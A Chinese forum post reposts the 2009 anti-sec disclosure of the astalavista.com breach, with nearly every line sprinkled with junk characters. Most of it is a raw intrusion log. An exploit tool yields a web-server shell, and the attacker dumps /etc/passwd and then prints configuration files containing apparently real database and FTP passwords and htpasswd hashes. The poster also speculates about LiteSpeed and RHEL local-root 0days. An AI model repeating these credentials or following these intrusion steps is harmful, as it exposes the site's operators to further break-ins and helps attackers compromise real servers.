里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
. j& P% F+ @5 D Y J9 q# @! D* [9 c7 L+ o% i: ?
[root@front3 ~]# curl -I litespeedtech.com
. [3 r; d7 R% ]7 W, e8 {" }HTTP/1.1 200 OK
7 ]5 @. J1 x; b. `2 g. j8 lDate: Fri, 05 Jun 2009 22:54:51 GMT
( k) i# @2 G% H( d$ ?Server: LiteSpeed1 {2 F# R d6 `9 T
! Z N: J) m# r7 S* z+ ]5 A& v! ^
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
# ]. t) J3 w+ O7 B: Q+ C8 x- W: ^9 p( S( O2 U
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。: J( c* P- q! r+ e7 d
- Y3 `( v9 j c
. h# v* H2 `6 N, O! m/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
# N! ^3 |2 ?1 q* `9 P- e9 T1 b- D/ b/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \( k, ^4 `4 j; U$ M) \7 R1 |
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
6 s) Y/ Q: I4 |4 w6 i9 l\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /9 E7 p# Z5 P$ E- b. }- X* A9 z
\/ \/ \/ \/ \/ \/ \/
* u D& O4 k' A$ r6 T The Hacking & Security Community
3 D+ a# j* C* C1 g[+] Founded in 1997 by a hacker computer enthusiast
0 ~( E/ h& ?/ ^[-] Exposed in 2009 by anti-sec group, I' E: F' w9 j2 p( c
, j1 n4 v' q! Q: x7 K. P! V6 _9 p9 |
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
1 n: v. c, ~7 M" {% _( u>> 03. Who’s behind the site?
2 n6 b6 a; K" H- |>>
5 p G8 I: Y( B. x! k' _: C3 s>> A team of security and IT professionals, and a countless number of contributors from all over the world.
& h* G- f+ k" b! }8 ?- Z6 E: a% r
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' ~) F5 i. f& a6 O; ? z8 O
>>
3 Y3 [6 [. e% @# ?$ j; ]. d( M>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
; v, h2 ^' d6 Y6 u0 w7 U* amilitary institutions.
+ R$ k% ], d4 @& G1 l8 T# {4 |9 E>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
) B7 B9 j4 |7 q
. E& U, ?5 d& K! G" M7 H- JWhy has Astalavista been targeted?
/ U- m! {6 H4 Q$ z5 [/ Y2 I; e. B! g, v0 b2 A# g
Other than the fact that they are not doing any of this for the “community” but
. d. k* E9 U! B4 c9 Z+ ifor the money, they spread exploits for kids, claim to be a security community
% ~. v' v. `& y' R; {5 @$ z(with no real sense of security on their own servers), and they charge you $6.66
/ O3 a* X( H) X8 O# }, ]2 P% ^' y5 Z* ?per months to access a dead forum with a directory filled with public releases: N9 _ i6 v' h) Z
and outdated / broken services.
7 T1 Y# }( V. T9 b+ z2 H
- G- x9 F9 Q- A# gWe wanted to see how good that “team of security and IT professionals” really is.# z4 _) {% l' K* v3 f0 ]
; h$ _3 z6 a: `+ n2 C9 n7 A& a; M
Let’s begin.
6 S9 p, F) n' C$ K3 a
- D( t* W( b# Y3 Eanti-sec:~# ./g0tshell astalavista.com -p 80" e3 @) f" o [1 h: d
[+] Connecting to astalavista.com:806 ?) A G \! d6 x( Q( E4 x- Y
[+] Grabbing banner…* s$ v* g/ U- A" k2 r
LiteSpeed
& q7 d9 n. v; F' }[+] Injecting shellcode…5 U* l3 `9 g0 [0 V( e
[-] Wait for it
/ u& w' V* V: A4 w2 H* _4 l" ~6 j. T
[~] We g0tshell0 Y3 B( G1 V+ ~7 l, p# e: v8 L' j
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
: ]/ J9 r& \/ P: JID: uid=100(apache) gid=500(apache) groups=500(apache); Q& D2 x; w. u/ @) U- G9 ]
" ?: e- Q1 F& Esh-3.2$ cat /etc/passwd) D' e: j9 q( ]
root:x:0:0:root:/root:/bin/bash
7 R6 h, |4 g0 w- w( jbin:x:1:1:bin:/bin:/sbin/nologin
: c0 s. M7 _7 a9 bdaemon:x:2:2:daemon:/sbin:/sbin/nologin
$ u% |8 o5 h2 e- x3 y% b7 Eadm:x:3:4:adm:/var/adm:/sbin/nologin
* j c* s9 @% _( p9 U+ rlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin8 I8 } Y: l2 l* E0 @+ ]
sync:x:5:0:sync:/sbin:/bin/sync5 `+ v9 k! ?+ M! y9 M
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
) W* [/ {- W. r: O" Ihalt:x:7:0:halt:/sbin:/sbin/halt! G, z6 q/ e: J6 u# L2 E. Y
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin8 a" c0 m; U5 f& K- v+ p0 _( C
news:x:9:13:news:/etc/news:
- S/ \, i: N5 ?. t X" @uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
0 `1 I5 o9 [5 _4 m& j5 q' R5 \6 goperator:x:11:0 perator:/root:/sbin/nologin+ @$ J0 D9 o: s& T& V ~
games:x:12:100:games:/usr/games:/sbin/nologin
; O( |: {2 F5 z. h' ~9 Ogopher:x:13:30:gopher:/var/gopher:/sbin/nologin
# g- F6 |/ p7 b9 ?( B8 q" }* sftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
2 ~) ?+ j% ?- R$ ^2 Q! enobody:x:99:99:Nobody:/:/sbin/nologin
8 c! ?0 F& l' G% E* E9 r* orpm:x:37:37::/var/lib/rpm:/sbin/nologin
: G( J! k/ H _2 ]2 ?dbus:x:81:81:System message bus:/:/sbin/nologin9 p; C5 F% r2 C7 N4 L
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
$ k( s/ u6 K: f/ rmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
# u z" O3 c4 j L0 w/ l/ qsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin7 J9 z! B; H' O- G
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin% M: S7 C+ a. q, @
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
, H! D+ w7 k3 k x- G7 G4 S. Y" |4 b" krpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
* E, ]( @' r/ P3 ]% D8 L/ n* mrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
: Y/ R: w" c" K1 c) l+ g! unfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin$ ~3 E$ Z# V# ?0 ^" p8 H, M3 h
sshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
3 Y8 @- I8 [* c! ^$ K; q% r+ X( q$ jpcap:x:77:77::/var/arpwatch:/sbin/nologin# B& T4 V R& _; l. h8 f4 t2 e# @) [
named:x:25:25:Named:/var/named:/sbin/nologin) p. a2 i7 B) ?( R& @
apache:x:100:500::/var/www:/bin/false
5 d! \& U- ?) e3 I! N2 Kdiradmin:x:101:101::/usr/local/directadmin:/bin/bash, q. a( s4 m: b! l' r+ z9 F6 Z
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash# D( E* F% w8 l0 S, I1 v6 L
webapps:x:500:501::/var/www/html:/bin/bash$ p# X9 C4 p! \1 o
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
2 ]- F: Z' c4 I+ Q! tadmin:x:501:502::/home/admin:/bin/bash
6 Q+ A- c" [6 O& x% Bjon:x:502:503::/home/jon:/bin/bash
' V5 c1 ?$ m$ A6 {( ^' v4 Pcom:x:503:504::/home/com:/bin/bash
. e# s4 S! p. u. ?ntp:x:38:38::/etc/ntp:/sbin/nologin4 L9 g T& X& u+ Z, A @
ais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
) g; ]/ M* {& Z7 `* bastanet:x:504:505::/home/astanet:/bin/bash( I) A! N# h1 j3 k) S
avahi:x:70:70:Avahi daemon:/:/sbin/nologin a2 r9 Z$ b( w6 W3 @5 K. m8 r& h
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
5 z d6 n( ? y& Q+ u6 g
* N" w( s+ U) Q7 {1 qsh-3.2$ cat /etc/hosts5 [5 z6 M& H: q7 m0 v4 {
# Do not remove the following line, or various programs
# d S8 t, G# ]) A! x1 m# that require network functionality will fail.
7 ^( G* U: v/ Y7 K- b( `127.0.0.1 localhost.localdomain localhost4 C5 P" |0 O" F
::1 localhost6.localdomain6 localhost6+ M7 |& t4 a% c3 j
80.74.154.172 asta1.astalavistaserver.com
: E: V- p& `+ i d( w2 i1 e
^ N" x8 L# J: @sh-3.2$ pwd
: x3 Z+ C1 ^! E5 l: m/home/com/public_html/ N, T) G( ~3 D+ F3 P8 H& X* z
- N( |5 {! ~9 b5 `& q; Q( |
sh-3.2$ ls -la) F: Z, b& e. ~* d n7 r3 M3 l
total 18460' M( b$ n" g! ^# v, ]$ z
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
; {# I0 V( |( L, qdrwx–x–x 11 com com 4096 Jun 25 2008 ..% O9 {3 e( b: {5 C9 l9 g5 m
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
, S; r' v3 b+ a) \5 Q: ^drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
* `% }; `6 \. v zdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin. R3 l& y1 w; f& a! b
drwxrwxrwx 2 com com 4096 May 19 00:50 config
5 g1 r0 d1 I6 h. U' s" c4 O+ y* _drwxr-xr-x 2 com com 4096 Mar 20 11:05 core) A9 P6 E: Z# q- E: w& T
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules0 @. L& k4 o8 B- r; M
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- ^5 G4 }) Y( e+ h# N4 n3 ddrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo5 ^% j8 G1 B w& H1 ]
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
! ~' c6 z: l' d-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php, {1 b7 r6 R# B, l. l9 b- O5 K( t4 H
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd) k& B q. W2 ^
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
1 b9 @ y7 A# ]5 C# w-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
9 |5 {1 Q; n( n! I1 D0 F4 S" Udrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed/ B3 W; w' G+ K8 z# ?9 \2 ?
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess `6 y. N8 _* R4 k6 ?+ ^: k
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
! m. N/ p4 C/ @% a-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak( K/ ] {# E, I: p( p) f) G& |
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
) W& _. Y. V6 t, y ^7 Qdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images( L7 f, S5 @8 F S6 L% f, b& T
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php3 b4 l( a8 t0 c" ^5 L
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer7 y0 U* o6 l" l0 n8 \6 ^; [( \
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang8 c. a- g& J4 d7 b; c
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib0 B1 u( z: A9 n2 Z( M
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
+ d& w7 U( Q% }/ Udrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
J" ^, x, F P( k& @3 Rdrwxr-xr-x 34 com com 4096 May 28 16:30 modules, ^0 W0 e7 g: E/ C
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin) A* A" d, H( w d% R% ]$ K; u
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
6 X* u3 ^# Y& c0 B3 Sdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old5 I1 b( x* a' Q' S& K. z
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy' K5 `0 x# D! ^2 f
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy! A q$ m J9 b T5 p. v$ X/ Q- s5 @
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt+ g( x% I6 [4 j
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
+ S! V( i# Z K-rw-r–r– 1 com com 223 Mar 30 15:32 test.php \( B0 U" n3 D1 W/ O) n, |
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes, T% {, B0 c8 Z. T- f
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp. d1 K Q |& F q3 h* O2 h
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam/ I! D0 }# f8 a& z _
/ L m1 ?) ?# m" D ^/ b5 ^' o/ F P
sh-3.2$ head -20 index.php9 R1 p- d( T" d' g" k v* Z
<?php
, b: r$ Y* Y7 _- o- h5 A4 x7 L( x
7 I, M* w$ T; j3 V/**
2 V8 [7 n/ N- w, o0 {* The main page for the CMS
0 Q# z" e% h+ q% j$ H K* @copyright CONTREXX CMS - COMVATION AG1 V7 _# t7 Y. \& d1 m
* @author Comvation Development Team
$ Z: W A; H, a% l* @version v1.0.9.10.1 stable' E2 n& w* @$ q, y3 o" J
* @package contrexx
$ i% E8 } d# e: |* @subpackage core
1 e+ l0 n# P4 U4 @ s# d* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
" c8 \9 A( v, q9 T7 q* t* @since v0.0.0.0
. e9 K! ?! r/ R o+ x. d* @todo Capitalize all class names in project
7 B* b2 W; {! z/ a0 a* @uses /config/configuration.php/ E1 n* F1 ?, U
* @uses /config/settings.php. g: Q& W7 n& |' ?
* @uses /config/version.php
7 I8 m9 b" N2 S1 I1 E* @uses /core/API.php
7 h* z% F" B' Y* @uses /core_modules/cache/index.class.php
3 o v& [; j: e' F! s+ s( b* @uses /core/error.class.php9 U) R' v+ c4 C' A3 y( c! F( U
* @uses /core_modules/banner/index.class.php: |% z- G$ o$ [1 [4 R: ~' \. J6 u
* @uses /core_modules/contact/index.class.php
1 c+ N" e* M0 d0 l) [" ^3 I
' S0 s* Q- A& ^& s; ish-3.2$ cd config/
! ~4 ?8 T- }2 C- a0 C" |sh-3.2$ ls -la C# Q4 }& _2 y; e+ F) h9 _6 g
total 32
8 u8 b- U6 B. y/ n- b" pdrwxrwxrwx 2 com com 4096 May 19 00:50 .
. d3 }# d0 F) B |$ y! \6 Udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: H) V) r. y# l z6 J4 f( d-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
# E0 s. @8 I9 A+ t-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! p- r2 p: v+ k2 N
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
2 s% S7 y$ N9 _" e/ |-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php( f9 [6 y7 s( D2 Y0 a& n( M
3 `; l. S0 V8 W4 x5 Y
sh-3.2$ cat configuration.php! M" _' o* F, \+ m3 N3 _; T5 z
[snip]
: A: c( X! E/ l1 ?% ~ O% y) \$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost4 v' x' x- I7 f% w
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name) Y% M+ z5 {: K3 K' z& E7 r/ e
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
+ E( [+ R) d! W$ I$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username6 J1 c/ t6 e( L8 R6 B+ {
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
; K! Q6 d1 R: }$ v$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)! J0 n5 i! |) _" ?, e6 [
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
1 _9 z5 O% Y Z! S[snip]
* m- i8 {/ x- v1 w1 H' l$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
2 h5 o6 p, k& ?9 V5 I1 p# t. o$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
) K0 I4 O3 e: H$ ~7 x `$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost) E1 f4 d9 I: b5 H+ W7 H
$_FTPCONFIG['port'] = 21; // Ftp remote port# Q+ q+ G" f; f ]+ A: B; C
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username. G& m6 C2 ]! f, f
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password* B0 A) _2 @ S6 z8 x
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms5 e, m% k4 u/ f8 ]: ]$ c' m
+ x! n4 g7 j) j# q. `sh-3.2$ cd ..9 J6 q& X$ \; I& W) M7 b8 }. k
sh-3.2$ cd dvd/0 Q. t4 y" a8 X# S& K
sh-3.2$ ls -la
" h( J; H# R! z! }total 2913780
7 M( ^) X5 U, L8 q% \/ udrwxr-xr-x 2 com com 4096 Sep 9 2008 .
* K0 f% A# [/ U: }9 bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
, m; }( x2 _8 Y# U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
% F) S' X/ R5 A' }3 X+ N% U-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar' ] R) a4 G9 O) z V
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
) m6 P6 l% T7 y- y% K; @! q3 U6 O' B-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
9 ^4 R" O% V2 u* @1 M/ O) M6 I7 k* R! K0 ^8 O" P) Q
sh-3.2$ cat .htaccess( I1 h* G/ |+ a) u
authType Basic5 L2 {6 N+ O( b: Y
authName DVD
4 R) C. Q4 V" jauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
" s! j& C( e2 R7 }require valid-user
! v& Y0 z- n" l' Z
" G: l7 b8 O* ^3 [sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd+ h+ Y c* D+ ?: f. ~0 S% M
DVDdownload:CRD8cuY6.MPT6
7 y; w" ?1 D+ h9 ^ c+ `DVDdownload2:CR8a36.wluFMg
& K5 q7 y: t# G4 ?& ? G' }* W1 o9 ~- g ?6 m1 l: f" b% b& I4 B
sh-3.2$ cat test.php
7 W) ]* q. I3 W! n5 Z$ _<?php
$ x+ \: I" b# {9 _- ?$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;$ }! J! p: O+ r t* ]
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
8 P2 I, M1 ]" ?echo $url;) H, C4 p+ z, H* \$ N3 ?
?>
% w, l: w1 K+ }. g/ x- |! [
' U6 K) P# F( m# |2 @- _; ~: }sh-3.2$ cd modifications/! G$ \" @' G2 K6 G6 @2 L
sh-3.2$ ls -la" a- j( i& Q( |; H; j) J3 y
total 32; Q! ~* p9 ~) d# a. E2 x
drwxr-xr-x 8 com com 4096 May 11 12:48 .. n: c/ W3 q3 e4 r. D% k3 C/ j
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
8 u( ^6 |% [7 N8 i" ~drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng7 c p9 U' J7 w& S* {8 q
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs+ q3 Q4 V- `) v7 l9 I1 A2 }8 a
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
, e7 }4 M, Z& a- Xdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
$ p& d4 d# A; L- r. c% X+ ndrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
8 S1 p2 k0 _- ^( sdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
8 }- u. J, L, |+ U- Q: Y- G; O E4 }( w) Z* }
sh-3.2$ ls -R
. }; }+ v% [5 @- ?/ @/ C.:
# C u0 }1 T( {com_avtng cronjobs onlinetools pjirc search _tmp6 B0 V, L- F' x. s5 A" h, L w; P
6 }$ X! C& F; @! S% K4 e5 a0 a
./com_avtng:
. |( v/ B# G t! N8 K1 uavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
2 U: f [" [8 z/ W( A7 O7 Z) L5 H- R; h# m$ m
./com_avtng/scripts:9 c, J- I: Z& G/ k9 X* Y5 \* Q
popunder.js, ?$ S/ Y, @4 }2 ]4 ]
" p, k- K8 a: g3 u7 H- O" u
./cronjobs:
6 z: a0 B# C8 l+ Iexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp& M% K e: k& f9 l& _! A1 h; C$ d$ R
/ o2 O9 I! i n" s& N./cronjobs/tmp:$ c2 B# z0 ?2 s/ X% N K
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv% {! P) n# z/ O
/ t) k6 Y% Z) @* I B./onlinetools:1 B; p% g) T! f7 ]# P1 n0 |
index.php
5 N6 G' @6 F! d3 v
; c/ h K7 d- h3 }- N9 d# l./pjirc:
: F! f- e c. \; ?1 l8 oa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt# L) D" k, }4 H- L ?* [
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt$ D; y3 |4 E' Y# M4 O3 M7 _
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
1 u1 m& m5 I- B/ `. X/ Z: [% q2 @9 a! X/ R! C2 Q5 v5 |# B
./pjirc/img:
; E2 ~! c5 m5 \- R" R0 _. b7 lange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif" u$ r2 T _, I' @3 U: K
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif + @$ B6 T2 d4 e8 n, q, @0 b! w% c
verre-eau.gif
+ C0 d1 ~6 D3 \3 A. J) pargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
% ~/ E& |& V& B) Z5 y6 @+ Rverre-vin.gif
* H! w5 A) q7 Y* Z4 yballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif# a8 U) t: Y5 v) c. D! F& G$ T( C
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
) C3 D8 |4 T S8 R+ B. u: F! Z! s4 n3 `: i# Y1 R6 g
./pjirc/snd:
# o" ?: Q5 H" w/ R8 u* Z9 |bell2.au ding.au
. r; \$ j: ]: ?( o
5 L) A' M& Z$ P7 }% U./search:/ Y1 S" L( \3 Q( Z5 l) N7 i
searchEngines.php search.php
6 V5 f5 Y' i. {7 O# r
1 n* Y3 C4 A# e9 _; ?# _./_tmp:
0 b7 S9 ?9 G3 adefaultPorts.php defaultPorts.txt
# |+ b- S( Q6 z: z: Z/ ]. n, G- L
# F! Q- ] }0 c$ F8 N% j1 i5 Ash-3.2$ cd cronjobs/4 T0 _5 g2 N5 ~2 @0 G; A! c7 X0 ~
sh-3.2$ cat exploits.php" e, D- s: Y# b4 S- L3 a3 u
[snip]
* f5 s9 u1 w' W& N7 ~ F# Z$categories = array();
% p; Z% I9 j* `) ~! s$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
! j- N. I {+ v4 U: x0 Q$expolits = file($milw0rmFile);9 j) g1 G% Z J* j
$comExploits = array();( L% Q- W1 x! c$ E- Q! i
[snip]
4 Q, \/ z2 l! F) K// manage data% w7 p: a; _ j9 W
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640% k+ U7 I* T' T* l0 }6 Q- s0 N. D
1 Y- g1 Z: G2 `$ H* x; q* n
// get path and title
8 w; s/ \/ F& Y& g5 a+ W# F $expolits[$x] = trim($expolits[$x]);
8 A! `) o. H' D+ s $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));. R( i6 ?/ r3 @! i5 N
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
6 `8 b; O4 {1 Z2 Z
9 p# @/ H7 Q4 w/ U' n. d I2 P y // check if file exists
. J0 I/ E% a" \0 _5 m if (file_exists($path)) {! W/ J) I8 W1 ]8 `2 }, B8 G
/ ?. f3 y# D( P8 e- u# b
$text = file_get_contents($path);5 M7 {' {7 Y0 {. l6 h6 O/ [
7 V3 a9 b. D; X% u& Q5 _5 t- F5 d
// get content and date1 u$ o( N( l3 v
//$text = htmlspecialchars($text, ENT_QUOTES);
6 Y% ]2 O0 ~7 D3 r $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
/ H' \/ i- b, q) B& v1 @ if ($tmptext != ”) {
* u4 _) u% n" {' a9 Y! E/ c $text = $tmptext;# c0 M: j: L4 Q5 u+ p
} else {. F7 X) c, M- U, I2 W
$text = addslashes(htmlentities($text, ENT_QUOTES));$ j4 c7 N0 z: X4 r5 E% t! l, {
}
! U# Q/ g N2 I: p$ n& u& U1 g $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
: x" B6 K. Y- N3 D( I# ^ $tmp = explode('-', $date);
! ^/ R! `: S! T9 d $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
5 u7 r) E* O/ z* S( j3 F8 D% w1 `" q $cat = getCategory ($path);
; ^+ Y9 A9 c7 m0 P $ext = pathinfo(basename($path));4 a6 y% y! N2 H
$ext = $ext['extension'];
- @/ c, v8 y8 }& ~; N; X $qStr = ”; O/ ?8 T$ r( i* {; K# {0 V; Z
SELECT `id`
; Y# P& G! E9 S) Z# B FROM `contrexx_module_exploits`& Q7 T' i \3 }5 Y$ h) L
WHERE `title` = ‘” . $title . “‘$ O5 [/ G; z3 c% b4 w' a
AND `date` = ‘” . $date . “‘
9 s, l5 c7 [$ t8 W! b “;
* D) T6 `; \ Z7 | echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;0 R' Q2 @. |$ n8 `6 Q9 U1 W2 P
$q = $_objDB->query($qStr);
! ^, x$ _5 i4 c6 a* w) C9 h2 g& r6 a) x
if ($q->numRows() == 0) {# m8 c2 s: O8 y. k5 R2 y
# y0 L! s9 `' b8 z- x. I& _
// prepare array# g Q" q5 t& U$ W, V: J) L0 A
$comExploits[$x]['date'] = $date;
9 [7 V0 k7 n4 S$ ] $comExploits[$x]['title'] = $title;. o3 F- i5 X% W7 L; l/ ?
$comExploits[$x]['author'] = ‘milw0rm’;
* f' Y, B9 |, V $comExploits[$x]['text'] = $text;- u- E4 ^& a& q+ O* ]- g: v! |& R
$comExploits[$x]['source'] = $ext;
' B$ Q3 `2 A9 N$ T5 a- J $comExploits[$x]['url1'] = ”;% ]2 [' H- Q& }; g( I3 h
$comExploits[$x]['url2'] = ”;
+ `- i: ~1 l% z8 o) W+ ^! L $comExploits[$x]['catid'] = $cat;; ^) U' B: ~$ \; e
$comExploits[$x]['lang'] = ‘2′;
- R A5 w! }9 i+ z: ^- N $comExploits[$x]['userid'] = ‘12′;, ?3 T( C& W- g" G1 a7 r
$comExploits[$x]['startdate'] = ‘0000-00-00′;
4 `/ {6 a+ r" `+ I8 o $comExploits[$x]['enddate'] = ‘0000-00-00′;
4 k. K3 v" a5 }4 ?) |" ?5 ` $comExploits[$x]['status'] = ‘1′;) [) E9 D* ?5 Y% d4 M
$comExploits[$x]['changelog'] = $date;
g( W3 N+ R$ i- L- y) d0 m% {3 v0 T/ `2 Y% d3 C& A
}
: i. r' x1 Q' I; y1 I/ @[snip]- p) m5 r9 [' K+ ^9 s0 B+ E
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>& M& o4 g7 G4 M
